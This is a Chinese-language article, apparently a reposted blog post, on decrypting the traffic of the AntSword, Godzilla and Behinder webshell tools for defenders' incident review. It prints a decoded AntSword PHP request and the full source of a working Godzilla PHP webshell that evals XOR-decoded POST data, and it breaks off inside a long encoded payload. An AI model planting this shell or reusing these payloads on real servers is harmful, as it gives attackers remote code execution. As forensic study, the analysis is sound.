Webshell工具流量加密解析
2022-7-19 00:7:46 Author: mp.weixin.qq.com(查看原文) 阅读量:8 收藏

前言

webshell管理工具作为进一步信息收集、内网渗透、获取更高权限等功能的好帮手,常出现在攻防对抗和渗透测试场景下,其自带的流量加密用来绕过其waf、ids等安全设备的连接,这里简单说下蚁剑、哥斯拉、冰蝎3.0这三款较为流行的工具在默认情况下的流量加密方式和解密方法,可以帮助守方在复盘时更好的攻击链还原和检测。

蚁剑

蚁剑的加密手段比较简单,在配置界面的加密手段只有base64和rot13,这两者都是无需密钥可直接进行解密的密码类型,这里以base64为例:

base64加密手段

提取参数后的编码直接进行base64解码:

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb3BhcnI9cHJlZ19zcGxpdCgiL1xcXFx8XC8vIiwkb3BkaXIpOyRvY3dkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskdG1kaXI9Ii45ZjFlN2ZjODYiO0Bta2RpcigkdG1kaXIpO0BjaGRpcigkdG1kaXIpO0Bpbmlfc2V0KCJvcGVuX2Jhc2VkaXIiLCIuLiIpO2ZvcigkaT0wOyRpPHNpemVvZigkb3BhcnIpOyRpKyspe0BjaGRpcigiLi4iKTt9QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJG9jd2QuIi8iLiR0bWRpcik7fTtmdW5jdGlvbiBhc2VuYygkb3V0KXtyZXR1cm4gQGJhc2U2NF9lbmNvZGUoJG91dCk7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMzU4ZGMiLiI1MjQyYiI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiNzkiLiJlNTUiO31vYl9zdGFydCgpO3RyeXtwaHBpbmZvKCk7CmVjaG8gImtpZCIKCjt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7

解密内容:

@ini_set("display_errors""0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$oparr=preg_split("/\\\\|\//",$opdir);$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir=".9f1e7fc86";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir","..");for($i=0;$i<sizeof($oparr);$i++){@chdir("..");}@ini_set("open_basedir","/");@rmdir($ocwd."/".$tmdir);};function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "358dc"."5242b";echo @asenc($output);echo "79"."e55";}ob_start();try{phpinfo();
echo "kid"

;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

哥斯拉

哥斯拉自带了几种加密方式,这里以php为例:分别为PHP_EVEAL_XOR_BASE64、PHP_XOR_BASE64、PHP_XOR_RAW为例。

PHP_XOR_BASE64

这个用哥斯拉生成的shell:

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){

        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            echo($payload);

            $payload=encode($payload,$key);
        }
        eval($payload);

        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

根据shell文件可以看出加密过程,先将pass传递内容base64解码,然后将内容与key进行异或操做,注意这里的key实际上是生成shell的key的32位md5的前16位。那么我们根据这些即可写一个一次性的解码脚本,用第一次哥斯拉进行流量交互的payload为例(这里的key值为key): 

得到的payload值

将内容url解码后放入脚本中 脚本如下:

<?php 
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';

$post = "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